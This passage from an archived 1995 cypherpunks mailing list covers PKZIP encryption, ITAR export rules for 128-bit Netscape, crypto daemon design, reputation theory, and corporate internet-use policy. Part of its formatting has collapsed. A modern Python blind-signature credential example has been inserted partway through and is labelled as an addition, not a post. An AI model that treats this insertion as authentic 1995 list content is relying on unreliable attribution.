about exploring this orthogonal new quirk of their machine. All the edges were rough in the beginning, and for a long time after the beginning. Network code arrived in huge inspired chunks from our eccentric talents. 
Other talents, staff and user alike, would go out to play on the network and find little suggestions for the eccentric talents responsible.

I think the early networks were less than satisfying for the mandarins. It required arcane mandarin accounting schemes to rationalize our perpetual deficits, even in a 'funny money' accounting world. Policies and standards were strained by the sudden accessibility of the foreign operations, under alien chains of command. The networks were immediately untidy and required compromise from the user. The biggest contribution from the mandarins, and I mean this with all gratitude, is that they chose, again and again, not to shut us down.

ObCrypto: we were still getting the bugs out of rot13 back then.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: Lou Poppler | http://www.msen.com/~lwp/ ::
:: * Support The Phil Zimmermann legal defense fund * ::
:: http://www.netresponse.com/zldf ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

From s1113645 at tesla.cc.uottawa.ca Tue Nov 21 16:42:52 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 22 Nov 1995 08:42:52 +0800
Subject: Proving I'm not Bob.
In-Reply-To:
Message-ID:

On Tue, 21 Nov 1995, David Scheidt wrote:

> What is this system? I can't think of any system that wouldn't work if
> rearranged so that instead of proving you aren't Bob, you simply don't
> prove that you are. It is true that they are not isomorphic, and that
> could be a problem in some situations, but I don't see this as one of them.

Hal and Futplex pretty much described it. I figured a proof of non-identity (if possible) would have saved one hell of a lot of messy authentication in those cases when there is only one possible cheater (due to economic incentives) with many possible pseudonyms (or friends).

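The "is-a-person" credential check that Hal Finney describes earlier in this thread (one blind signature per exponent, two people compared on a matching exponent), as an added Python example that is not part of any poster's message. The toy RSA modulus, the SHA-256 encoding of the signed value and all class and function names are assumptions made for illustration.

```python
import hashlib
import secrets
from dataclasses import dataclass
from math import gcd

# Constructed toy parameters: two Mersenne primes keep the example short and
# offline. A real agency would use a properly generated RSA modulus.
P = 2**127 - 1
Q = 2**107 - 1
EXPONENTS = (5, 11, 13, 17)   # one credential series per public exponent


def hash_to_int(e: int, x: bytes, n: int) -> int:
    """Assumed encoding: the signed value is SHA-256(e || x) reduced mod n."""
    digest = hashlib.sha256(e.to_bytes(4, "big") + x).digest()
    return int.from_bytes(digest, "big") % n


@dataclass(frozen=True)
class Credential:
    e: int      # exponent (series) this credential belongs to
    x: bytes    # random serial chosen by the holder, never sent to the agency
    s: int      # unblinded signature: s^e == hash_to_int(e, x, n) (mod n)


class Agency:
    """Issues at most one blind signature per (person, exponent)."""

    def __init__(self):
        self.n = P * Q
        phi = (P - 1) * (Q - 1)
        # pow(e, -1, phi) raises ValueError if e is not invertible mod phi.
        self.d = {e: pow(e, -1, phi) for e in EXPONENTS}
        self.issued = set()   # (biometric, e) pairs already served
        self.seen = []        # blinded values: all the agency ever learns

    def sign_blinded(self, biometric: str, e: int, blinded: int) -> int:
        if e not in self.d:
            raise ValueError("unknown exponent")
        if (biometric, e) in self.issued:
            raise PermissionError("credential for this exponent already issued")
        self.issued.add((biometric, e))
        self.seen.append(blinded)
        return pow(blinded, self.d[e], self.n)


def obtain(agency: Agency, biometric: str, e: int) -> Credential:
    """Holder side: pick a serial, blind it, get it signed, unblind."""
    n = agency.n
    x = secrets.token_bytes(16)
    m = hash_to_int(e, x, n)
    while True:                                # blinding factor r, a unit mod n
        r = secrets.randbelow(n - 2) + 2
        if gcd(r, n) == 1:
            break
    blinded = (m * pow(r, e, n)) % n           # agency sees only m * r^e
    s_blind = agency.sign_blinded(biometric, e, blinded)   # equals m^d * r
    s = (s_blind * pow(r, -1, n)) % n          # unblind to m^d
    return Credential(e, x, s)


def verify(n: int, c: Credential) -> bool:
    """Anyone can check a shown credential against the agency's public key."""
    return (c.e in EXPONENTS and 0 < c.s < n
            and pow(c.s, c.e, n) == hash_to_int(c.e, c.x, n))


def shown_by_different_people(n: int, a: Credential, b: Credential) -> bool:
    """True only if both credentials are valid, share an exponent, and differ."""
    return (a.e == b.e and verify(n, a) and verify(n, b)
            and (a.x, a.s) != (b.x, b.s))


if __name__ == "__main__":
    agency = Agency()
    # Constructed biometric identifiers stand in for the physical check.
    alice = obtain(agency, "constructed-thumbprint-alice", 5)
    bob = obtain(agency, "constructed-thumbprint-bob", 5)
    print("distinct people:", shown_by_different_people(agency.n, alice, bob))
```

The check says nothing about collusion: a publisher's friend holds a different valid credential, which is the limit Futplex points out in the same thread.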
From cme at TIS.COM Wed Nov 22 08:51:06 1995
From: cme at TIS.COM (Carl Ellison)
Date: Wed, 22 Nov 95 08:51:06 PST
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511212323.PAA02457@comsec.com>
Message-ID: <9511221641.AA14712@tis.com>

>Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
>From: Raph Levien

> First, a few words about what I consider to be good interface that
>can support plug-in crypto.

[...]

> I propose that the new interface lives as a sort of daemon, rather
>than a static collection of command line script pieces.

Danger, Will Robinson! (see below)

[...]

> Once the negotiation has been established, the application can send
>the daemon MIME objects that the app does not understand but the
>daemon does (for example, an image/fractal). The daemon can return a
>MIME object that the app does understand (for example, an image/ppm).

This part sounds good...a sort of master translation service.

> Alternatively, the daemon may request an authentication. This is
>useful when resolving external bodies that require authentication,
>including non-anonymous FTP, and standard authenticated HTTP. In this
>case, the daemon sends a message to the app requesting the
>authentication. It specifies whether it needs both username and
>password, or just password. In the latter case, it hands a username to
>the application.
> The application can then query the user for the authentication
>data. It hands this back to the daemon. In reply, the daemon indicates
>success or failure. In case of success, it hands the object back to
>the app.

Now I get worried. This communication with the demon is via some IPC -- maybe even via a LAN. Some things can't be distributed safely and authentication is #2 on my list.

> Encryption is a bit more tricky, but in essence you just hang a
>premail-alike off this kind of protocol. The hard part is specifying
>the key, but you just call it a "parameter" and put in hooks for the
>daemon to ask for whatever parameters it needs.

Crypto keys are #1 on my list of things you can't distribute (unless they are wrapped, of course).

> This requires that
>keys have some nonforgeable names, which is unfortunately not a
>feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
>Certification Authority ( at Nick Szabo).

Public keys, if that's what you're talking about, have perfectly good nonforgeable names -- themselves. They are unique. They are the proper name which can collect all the attributes of that key which are of interest (e.g., permission to spend $, name of a human who knows the private key, attributes about that human, etc.).

> One final aside: I've been fairly frustrated with this mailing list
>as a forum for talking about real design proposals and implementation
>issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
>tend to attract far more attention than real crypto work. I want a
>forum for, and just for, cypherpunks who write code. If I had just a
>smidgen more free time (as if), I'd be trying to start one
>myself. Anyone else?

I've seen this happen several times. As a list gets popular, it diversifies. You might try sci.crypt.research -- since it's moderated.

- Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme |
|Trusted Information Systems, Inc. http://www.tis.com/ |
|3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 |
+--------------------------------------------------------------------------+

From weld at l0pht.com Wed Nov 22 08:54:21 1995
From: weld at l0pht.com (Weld Pond)
Date: Wed, 22 Nov 95 08:54:21 PST
Subject: Pedophiles use encoding devices to make secret use of Internet
Message-ID:

I guess they moved the URL. Try this one.

http://www.nando.net/newsroom/ntn/info/112195/info429_4.html Weld Pond - weld at l0pht.com - http://www.l0pht.com/ L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From ses at tipper.oit.unc.edu Wed Nov 22 09:09:18 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 22 Nov 95 09:09:18 PST Subject: Secrets of the Internet In-Reply-To: Message-ID: On Wed, 22 Nov 1995, James M. Cobb wrote: > known as PGP -- Pretty Good Privacy -- > and > Experts estimate that it could take 10 years for computer > systems to crack the individual codes. Never underestimate the power of GCHQ- when they unfreeze Alan Turing from the cryogenic vault, good things happen. From perry at piermont.com Tue Nov 21 18:55:41 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 22 Nov 1995 10:55:41 +0800 Subject: PKZIP - Encryption In-Reply-To: Message-ID: <199511220223.VAA18118@jekyll.piermont.com> "L. DEkel" writes: > PKZIP Encryption: > > PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc. > Maybe it's time to put things in the right perspective. > > One must realize (yet again) the difference between: > Theoretical Cryptography - and - Practical Cryptography: Er, I don't understand. I could see why one would want to use a weak encryption system if it bought you something. However, good encryption systems are as cheap to use as bad ones. Therefore, why ever use a bad one? If the top of the line lock costs the same amount as a toy lock, why buy a toy? 
Perry From weld at l0pht.com Tue Nov 21 19:01:17 1995 From: weld at l0pht.com (Weld Pond) Date: Wed, 22 Nov 1995 11:01:17 +0800 Subject: Pedophiles use encoding devices to make secret use of Internet Message-ID: Story in Nando Times http://www2.nando.net/newsroom/ntn/info/info429_4.html Weld Pond - weld at l0pht.com - http://www.l0pht.com/ L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From jsw at netscape.com Tue Nov 21 19:10:00 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 22 Nov 1995 11:10:00 +0800 Subject: Export control FTP servers In-Reply-To: <9511210441.AA26515@sulphur.osf.org> Message-ID: <30B28957.4C06@netscape.com> I thought that they had not yet released their official policy. Last time I heard they were still refusing to put anything in writing saying that your measures were "ok", pending release of their official policy. If John is indeed leaving, this will give the powers-that-be an excuse to delay even longer. --Jeff attila wrote: > > well, since it is "official" policy and the basics concern rejecting all > foreign addresses and making the proposed recipient agree to a file > statement agreeing not to export and that he/she/it is an American or > Canadian citizen, it might be nice if someone who has the `sed ....` > and/or `awk...` scripts would post them for all to use (with whatever > disclaimers, etc.) > > On Mon, 20 Nov 1995, Rich Salz wrote: > > > > I do what RSADSI does with ftp.rsa.com. It requires a cronjob > > >and sed. I didn't get the NSA to approve it, but I figure if it's good > > >enough for RSADSI it's good enough for me. > > > > I believe some of the following has been posted here before. > > The person to speak with is > > John Sonderman > > Office of Defense Trade > > Department of Compliance > > 703 875 6644 > > He's supposed to be Internet-aware. What's not common knowledge is > > that he's leaving by early December for budgetary reasons. 
If you're > > thinking of putting export controlled stuff up for FTP, you should > > probably contact John now. > > /r$ > > -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From fstuart at vetmed.auburn.edu Tue Nov 21 19:38:50 1995 From: fstuart at vetmed.auburn.edu (Frank Stuart) Date: Wed, 22 Nov 1995 11:38:50 +0800 Subject: Spam the Sign! Message-ID: <199511220307.VAA01713@snoopy.vetmed.auburn.edu> [...] > Do you have a legal opinion to support this statement? Our lawyers >tell us that executives of netscape could go to jail if we make the >128bit version of netscape available from an "export controlled" >ftp or http server. We are working to clarify the situation with >the government or figure out an alternative distribution scheme that >will remove us from the grey area. No legal opinions here, but perhaps you give it to someone who you know is legally entitled to have it and give them permission to redistribute it. For example, MIT, RSA, and c2.org already distribute export-controlled software via FTP, so if they're willing, you could give copies to people there and publish MD5 checksums. > Getting the US version of netscape widely available is one of my >highest priorities, but I can't tell Barksdale that he should go to >jail over it. I'm constantly pushing from within the company to keep >things moving forward. It's appreciated as is your participation here. > In the mean time I appologize to the linux users who can't even >buy the 128 bit version. If something changes on this front I'll >be sure to let people know. | (Douglas) Hofstadter's Law: Frank Stuart | It always takes longer than you expect, even fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law. 
From skaplin at mirage.skypoint.com Tue Nov 21 19:44:30 1995 From: skaplin at mirage.skypoint.com (Sam Kaplin) Date: Wed, 22 Nov 1995 11:44:30 +0800 Subject: Syrinx Remailer is no more Message-ID: <30b29639.13106184@popmail.skypoint.com> Effective immediately syrinx at c2.org is no more. I no longer have the time to keep this remailer up and running. Perhaps somewhere down the line I will set up another one. Please remove Syrinx from your chains. Sam From llurch at networking.stanford.edu Tue Nov 21 20:03:28 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 22 Nov 1995 12:03:28 +0800 Subject: Are there enough FBI agents to handle Digital Telephony????? In-Reply-To: Message-ID: Don't the numbers include all types of interceptions, both wiretaps and records of what number you call? You also don't need to listen live. Recording media is cheap these days. Record all calls, put into a database keyed by time and number called, refer to it later. -rich From dekel at carmel.haifa.ac.il Tue Nov 21 21:09:27 1995 From: dekel at carmel.haifa.ac.il (L. DEkel) Date: Wed, 22 Nov 1995 13:09:27 +0800 Subject: PKZIP - Encryption Message-ID: "L. DEkel" writes: >> PKZIP Encryption: >> >> PKZIP encryption is often said to be: Weak, "a joke" ,"a deception" etc. >> Maybe it's time to put things in the right perspective. >> >> One must realize (yet again) the difference between: >> Theoretical Cryptography - and - Practical Cryptography: "Perry E. Metzger" writes: > I could see why one would want to use a weak encryption system if it > bought you something. However, good encryption systems are as cheap to > use as bad ones. Therefore, why ever use a bad one? If the top of the > line lock costs the same amount as a toy lock, why buy a toy? 
Your remark is basically correct, here are few clarifications: I didn't recommended PKZIP for encryption, I said it's an Archiver that has an option to encrypt it's files, and that Practically this encryption is not so bad as people think. About costs: a complete system, including hardware, to support "full armor" for a computer, is far more expensive than using PKZIP, so the question is again of money, but that depends of what you're trying to encrypt. If you are a bank for example, it would make sense to spend several thousands on such a system, if you just send your friend a letter once in a while, containing a movies lists, than PKZIP is enough, you don't have do use say PGP. An good opposite example is PGP: you could define it as an Encrypter which has an archiving option (Of course it archives for the purpose of encryption), so why not use PGP as an archiver instead of PKZIP ? Because: There is the question of convenience (security=1/convenience - postulate), people don't like to pass their plaintext through several utils, where one compresses it, the other encrypts etc., they want a convenient util to use. But: Who says this old postulate (security=1/convenience) is correct today ? you can write a program/script/batch to do all sorts of dirty jobs, why not write a multi-purpose: compression/encryption/mailing/etc. system ? or just use a simple script/batch util to "glue" the different utils together ? Of course it has been done: (here are some examples) compression/encryption system - with HPACK archiver which uses PGP, the UC2 (PRO) archiver which uses 3DES. encryption/mailing(sometimes with compression) system - PEM, RIPEM etc. More problems there: These utils are not "standard" as yet, many people say they want a popular archiver where they know "everybody" use, and PKZIP is among the popular and multi-featured among the archivers, so why,they say, would they bother to adopt an esoteric encrypter or archiver ? 
The main problem: people are not "privacy protecting" oriented, they
don't care too much about the subject. ("who will bother to crack this
system just to read my mail?")

What do we do? Educate them of course. That is why the spread of
knowledge in the subject is so important. (Knowledge, not unsubstantiated
rumors).

All in all, there is no reason not to use a crypto system, if you think
your privacy/safety are in danger. I claim that in this world of
compromises, choosing PKZIP is not as bad as presented, knowledge should
be passed to all users about the risks involving the use of one system or
the other, but there are too many rumors that obscure the subject and can
misguide a user, not versed in the field of cryptography.

And if you "must", choose PKZIP (it is better encrypting than none, and
better than some, like ARJ, but certainly not among the best).

,,,,,,,,,,,,,
DEkel (noXys)
'''''''''''''

From dlv at bwalk.dm.com Tue Nov 21 21:23:12 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 22 Nov 1995 13:23:12 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <199511210731.XAA08374@jobe.shell.portal.com>
Message-ID:

Alice de Nonymous writes:
[dlv]
> > Fred is right. I used to work for Goldman Sachs & their internet usage
> > policy stated that when you write to Internet or Usenet from a GS account,
> > it will reflect on the firm no matter how you disclaim it.
[alice]
> I think this is true, and is where we start to get into reputations and
> trust.
>
> If someone from Goldman Sachs posts to a Usenet group discussing abortion
> or gun-control, and says that: "These opinions are my own and not my
> employers." Then, we can accept that, no matter how silly their opinions
> are.

Unfortunately, most employers won't accept this. A couple of years ago
Sun Micro fired Philip Stromer for posting homophobic jokes to Usenet.
A good friend of mine was fired from Microsoft for sending politically
incorrect articles to a Ukrainian mailing list.
(He was born in Ukraine.) Someone complained to MS and he was axed.
Interestingly, most of his offensive messages came from his CompuServe
account; only a couple of tamer ones were from his microsoft.com address.
The complainer and Microsoft apparently felt that since he was known to
work for Microsoft, it didn't matter that he posted mostly from Compuserve.

I think Goldman's policy on Internet use is pretty reasonable. I'm
attaching at the end a couple of interesting e-mails that explain their
philosophy.

> But there is a difference in the way we look at it if someone from Goldman
> Sachs posts to misc.invest.stocks instead and says that the Goldman Sachs
> Strip Coupon Fund is better than the one from Merrill Lynch -- that it's
> safer and produces higher returns because Goldman uses cubic spline
> interpolation methodologies to interpolate the yield curve, while Merrill
> Lynch doesn't. There is a difference here.

Hmm... If it looks remotely like marketing, it'd better carry the usual
disclaimers that past returns are no indication of future returns etc. :)

> In the first case, the poster is not commenting about anything to do with
> their work, -- it really is just one man's opinion -- while in the second
> they are actually commenting upon something their employer is selling.

Even in the first case, the poster is using a Goldman e-mail address,
which is comparable to using Goldman stationery to write a personal
letter. If he says something pro- or anti-gun/abortion that might
antagonize a potential client and cause him not to do business with GS,
then GS is right not to like this.

> If the employee tries to add, "these opinions are my own, and do not
> reflect the opinion of my employer" then we have a huge credibility
> problem.

I think these disclaimers are just silly and can't be taken seriously.
If he posted an article to alt.sex.pedophile discussing his desire to
have sex with children, surely this would reflect on Goldman no matter
how he disclaimed it, and he would deservedly be in trouble.

> You really can't have it both ways. You can't post officially and
> unofficially at the same time, unless it really does have nothing to do
> with your work.

Goldman's policy seems to indicate that if you post from a commercial ISP
and don't claim to speak on behalf of Goldman, they don't care what they
say. This is better than some...

But consider this hypo. Joe Shmoe, an analyst with GS Research, posts an
article to misc.invest.* saying that he likes stock XYZZY. He posts from
another ISP and doesn't mention that he works for Goldman. But one of the
many kooks that invest misc.invest.* recognized Joe and shouts: *LOOK!
THIS IS JOE SHMOE FROM GS RESEARCH! *. At which point, the readers take
Joe Shmoe's postings much more seriously, and Goldman asks him whether
he's put XYZZY on the restricted list.

(Disclaimer: I definitely don't speak for Goldman and am just supposing
what might happen in a situation like this :)

> If you post from Sun Engineering, and you are posting to a group that
> focuses on Sun, and you are talking about a Sun product, then people are
> going to take your comments as an official statement from Sun. You are
> that product's spokesperson, whether you disclaim or not, and should act
> accordingly. No matter what, that's the way people are going to see it.

I would venture as far as to say that if you post from Netcom, but are
known to work for X, then you have much more credibility speaking about
X's products or future plans than some unknown person. Your reputation is
thus both enhanced by X and partially owned by X. X would be within its
right to ask you not to speak about X's affairs in public. The readers
would have the right to assume that you know more about X's affairs and
decision-making than someone from the street.
Greater credibility carries with it greater responsibility, both to X and
to the readers. If you want a reputation that's independent from X, you
could get an ISP account under an assumed name, or post via an anonymous
remailer, and build a reputation from scratch.

Here are a couple of quotes regarding Goldman's Internet usage guidelines:

-----------------------------------------------------------------------------
Date: Wed, 10 May 1995 12:35:49 -0400
Resent-From: dimitry.vulis at nyapps01.gsam.gs.com (DLV)
From: Gary Schermerhorn
Subject: Internet GuideLines
To: gsamit at athena.fi.gs.com
Message-Id: <199505101635.MAA27299 at nyapps01.gsam.gs.com>
Mime-Version: 1.0
X-Mailer: Z-Mail (3.2.0 06sep94)
X-Mailer: Mozilla/0.96 Beta (Windows)
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Many of you have asked me for the firm's Internet Guidelines. I have
attached them below. Call me or Hans if you have any questions.

> [Image] Internet Access (including Internet mail)
>
> ------------------------------------------------------------------------
>
> The Firm has clear policies on the appropriate usage of computer
> resources listed in a pamphlet entitled "The Keys To Information
> Security". This pamphlet is distributed to all new employees during
> their New Employee Orientation on the first day of employment. The
> policy in part:
>
>      Goldman Sachs' computers and software should be used for
>      business purposes only. Software and data created on Firm
>      systems or by Firm employees are the property of Goldman
>      Sachs. Only authorized use of the systems is permitted.
>
> You should be aware that unauthorized use of the systems may result in
> disciplinary action by the Firm, possibly including termination.
>
> ------------------------------------------------------------------------
>
> Q: What does "for business purposes only" mean?
>
> A: It means that except for de minimis personal use, you should only
> use the Internet (including Mosaic and Internet mail) for tasks
> related to your job function.
>
> ------------------------------------------------------------------------
>
> Q: Does this mean I cannot browse the Internet unless I know what I'm
> retrieving?
>
> A: The Internet is a resource beyond comprehension; even some of the
> Firm's veteran Internet surfers do not know about most of it. Browsing
> the Internet while looking for business-related resources is
> acceptable. Browsing the Internet with the intent of looking for
> non-business-related resources (such as the latest copy of Tetris) is
> not acceptable. Using the Internet to retrieve recreational pictures
> and other non-business items is not acceptable.
>
> ------------------------------------------------------------------------
>
> Q: What if I have an Internet application I want to use that isn't
> currently supported?
>
> A: Consult with the Information Security group (unix at is.gs.com).
>
> ------------------------------------------------------------------------
>
> Q: How does anyone know what I look at on the Internet?
>
> A: All Internet services leave an audit trail which is kept by the
> Information Security group. This logfile can be requested by your
> manager.
>
> ------------------------------------------------------------------------
>
> Q: Why is the Firm concerned about Internet access?
>
> A: There is a charge to the Firm for the Internet use time. Other than
> de minimis personal use, non-business use constitutes theft of Firm
> property.
>
> In addition, many Internet applications (especially Mosaic) can
> potentially consume large amounts of network bandwidth. This has a
> significant impact upon your environment and can consume limited
> shared resources such as bandwidth and CPU. Heavy recreational usage
> of Internet services could consume bandwidth needed to deliver
> critical business data.
>
> Furthermore, certain accessed materials such as sexually-oriented
> materials may be offensive to others whom it is visible.
>
> Finally, when you send mail or news out to the Internet from a Firm
> system, you not only leave a trail throughout the Internet with the
> Goldman's name on it, but you also provide people on the Internet with
> an impression of Goldman, regardless of how you disclaim it. Plainly
> put, do not use the Internet (including email and news) for
> non-business related work.
>
> ------------------------------------------------------------------------
>
> Q: How does this apply to Internet mail?
>
> A: Internet mail follows the same guidelines as Internet connections.
> You should not use Internet mail for purpose not related to your job
> function. One example of an appropriate usage would be for a system
> administrator to use a mailing list to learn more about a particular
> software package, such as Kerberos.
>
> An inappropriate use would be if you joined a list of bicyclists in
> the area and had that mail sent to your email account at work. Such
> mail is not related to your job-function (unless you happen to be the
> Goldman Investment Research Analyst assigned to bicyclists on the
> Information Superhighway).
>
> ------------------------------------------------------------------------
>
> Q: So is it okay to correspond with clients through Internet mail?
>
> A: Communicating with clients is carefully controlled by the
> Compliance people in for your business unit. You should obtain the
> same internal approvals when sending email to clients over the
> Internet as you get when sending paper mail to them. If you have any
> questions, check with your Compliance person first; do not send email
> to a client with the intention of resolving these issues later.
>
> ------------------------------------------------------------------------
>
> Q: What about Usenet news and mailing lists?
>
> A: When you post to Usenet news or send mail to a mailing list, you
> are providing an impression to the world of Goldman. Even if you
> "disclaim" what you are saying as "only your opinions", anything you
> say will continue to reflect on the Firm. Do not use news and mailing
> lists for personal or non-business purposes.
>
> ------------------------------------------------------------------------
>
> Q: I really want to play with the Internet without all these
> constraints, what should I do?
>
> A: There are dozens of businesses that provide personal connections to
> the Internet for a very low cost (between $10 and $30 / month). If you
> want to explore the Internet, purchase a membership for one of
> these services and explore the Internet on your own time, without
> using Firm computers or networks.
>
> ------------------------------------------------------------------------
>
> Q: Where should I go if I have more questions?
>
> A: Your supervisor can help you determine what Internet resources may
> or may not be related to your job function.
>
> ------------------------------------------------------------------------
>
> Unix Information Security Staff / webmaster at is.gs.com

-----------------------------------------------------------------------------
Date: Mon, 08 May 1995 12:09:27 -0400
From: Gary Schermerhorn
Subject: Internet Usage
To: gsam.all at athena.fi.gs.com
Message-Id: <9505081209.ZM11783 at itpc01>
Mime-Version: 1.0
X-Mailer: ZM-Win (3.2.1 11Sep94)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7BIT

Just a reminder about Internet usage policy;

Please read the 'Internet Access Policy' statement, which is available on
the GSAM Home page, or email me and I will send you a copy.

ALL World Wide Web accesses are monitored against a list of known servers
and keywords which are understood to be inappropriate. This list is
available to me each month. You should all avoid Web access that will end
up on this list.
Inappropriate use of the Web is equivalent to inappropriate phone usage
(e.g., 900 numbers).

Please read the Internet Access Guidelines. Encourage your staff,
particularly new staff, to read them also. The spirit of the guidelines
is very clear.

Thanks.

--
Gary Schermerhorn (scherg at gsam.gs.com)
Goldman Sachs Asset Management
(212) 902-3344 (phone)
(212) 902-1384 (fax)

---
Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jamesd at echeque.com Tue Nov 21 21:43:33 1995
From: jamesd at echeque.com (James A. Donald)
Date: Wed, 22 Nov 1995 13:43:33 +0800
Subject: towards a theory of reputation
Message-ID: <199511220523.VAA28300@blob.best.net>

At 01:14 PM 11/21/95 -0800, Wei Dai wrote:
> The first step toward a theory of reputation is defining what reputation
> is. [...] If these interactions are mainly economic in nature,
> then we can represent Alice's reputation of Bob by a graph with
> the horizontal axis labeled price and the vertical axis labeled
> expected utility.

Any attempt to discuss and analyze reputations using morally neutral
language is bound to wind up as boring long winded meaningless
complicated word salad.

You will wind up in the same place as the behaviorists did, going in
ever diminishing epistemological circles until you vanish into the
whichness of why and the whyness of which.

Some things, for example reputations, behavior, or the principle of
mathematical induction, necessarily involve concepts that are
philosophically problematical. Any attempt to discuss these things
while avoiding philosophically problematic concepts invariably
degenerates into total fog.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From kinney at bogart.Colorado.EDU Tue Nov 21 22:31:03 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Wed, 22 Nov 1995 14:31:03 +0800
Subject: PKZIP - Encryption
In-Reply-To:
Message-ID: <199511220607.XAA12915@bogart.Colorado.EDU>

L. DEkel writes:
>
> "Perry E. Metzger" writes:
> > I could see why one would want to use a weak encryption system if it
> > bought you something. However, good encryption systems are as cheap to
> > use as bad ones. Therefore, why ever use a bad one? If the top of the
> > line lock costs the same amount as a toy lock, why buy a toy?
>
> There is the question of convenience (security=1/convenience - postulate),
> people don't like to pass their plaintext through several utils, where one
> compresses it, the other encrypts etc., they want a convenient util to use.

I think the point is that the postulate is true only because the people
who write "convenient" software usually either don't have a proper clue
about security or are afraid of crossing ITAR. Secure encryption
algorithms are intrinsically no less convenient than insecure ones. Quite
the opposite, from what I've seen: secure algorithms tend toward
simplicity, because it's easier to prove theorems with a simple algorithm
than with a convoluted one. RC4 is a fine example of this, astonishingly
uncomplicated.

It's as easy to drop IDEA into a compression/archiving utility as it is
to put in the dreaded "proprietary" algorithm. Easier. And if you don't
want to pay the licensing fees, use Blowfish or 3-DES. Why these
companies don't is anybody's guess.

Take the example of StuffIt on the Mac, which started out with DES and
moved to some internally produced algorithm for reasons no one at Aladdin
has been willing to explain to me, even when I asked with relative
bluntness. Evidently, it was worth some trouble to them to _reduce_ their
security, of all things. That is a sad, sad situation.
(No particular flame on Aladdin, other than the obvious technical one.
They're a fine bunch of folks, from my experience.)

-- Will

From weidai at eskimo.com Wed Nov 22 00:41:31 1995
From: weidai at eskimo.com (Wei Dai)
Date: Wed, 22 Nov 1995 16:41:31 +0800
Subject: towards a theory of reputation
In-Reply-To: <199511220523.VAA28300@blob.best.net>
Message-ID:

On Mon, 20 Nov 1995, James A. Donald wrote:
> Any attempt to discuss and analyze reputations using
> morally neutral language is bound to wind up as boring long
> winded meaningless complicated word salad.

I don't understand what you mean by this. Can you give an example to how
to discuss reputation (i.e., the concept of reputation, not a particular
reputation) using morally non-neutral language?

William J. Halverson wrote:
> What is the difference between 'reputation' and 'value'?

When we say the value of some object, we implicitly assume that the
quality of the information we used to evaluate the object is good enough
that we don't have to deal with uncertainty. When we speak of reputation
however, we explicitly assume that we have less than perfect information
and that uncertainties must be dealt with. We normally speak of value of
objects and reputation of entities, because information about objects are
usually easier to obtain than information about entities.

> Why quantify it? If Bob's advertising/testimonials are successful,
> he may not even have a 'reputation' because only insiders know
> about him.

Quantification is an abstraction that sometimes allows one to think about
a concept more clearly. You decide whether this is the case for
reputation. I don't completely understand your second sentence. Only
people who know that Bob exists has a reputation of him, so if only
insiders know he exists, his reputation consists of the insiders'
reputations of him.
Wei Dai

From post at txcc.net Wed Nov 22 16:47:10 1995
From: post at txcc.net (post at txcc.net)
Date: Wed, 22 Nov 95 16:47:10 PST
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
Message-ID: <199511230245.SAA00660@txcc.net>

At 01:28 PM 11/22/95 -0500, you wrote:
>
>A.Back at exeter.ac.uk writes:
>> It is much more efficient of list bandwidth to post short pointers
>> only, of the style John Young posts.
>
>I agree with you. John's posts are not always strictly on topic but
>they are always just pointers, and he typically posts them in a single
>group a day. They are also always very high quality information. I
>find them to be perfectly fine.
>
>The recent "Friend;" stuff just annoyed me, though.
>
>Perry
>
>
I agree with you.

Sid

From jsimmons at goblin.punk.net Wed Nov 22 17:14:11 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Wed, 22 Nov 95 17:14:11 PST
Subject: Spam the Sign!
Message-ID: <199511230113.RAA01841@goblin.punk.net>

> >
> > I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> > and sed. I didn't get the NSA to approve it, but I figure if it's good
> > enough for RSADSI it's good enough for me.
>
> Do you have a legal opinion to support this statement? Our lawyers
> tell us that executives of netscape could go to jail if we make the
> 128bit version of netscape available from an "export controlled"
> ftp or http server. We are working to clarify the situation with
> the government or figure out an alternative distribution scheme that
> will remove us from the grey area.
>
> Getting the US version of netscape widely available is one of my
> highest priorities, but I can't tell Barksdale that he should go to
> jail over it. I'm constantly pushing from within the company to keep
> things moving forward.

Actually ;-) Barksdale going to jail would probably advance the cause of
strong cryptography more than anything I can think of. Can you imagine
the media circus when he's led out the door in handcuffs?
A man worth somewhere around a billion dollars being arrested for trying
to give away his product? Court reporters trying to explain ITAR to the
public? The mind boggles.

... and he looked over at me and said, "What are ya in for?" and I said,
"Giving away free software," and they all moved away from me on the
bench ...

You guys didn't get to where you are now waiting around for HTML v3.0 to
be approved. There must be some way to challenge an attempt to use ITAR
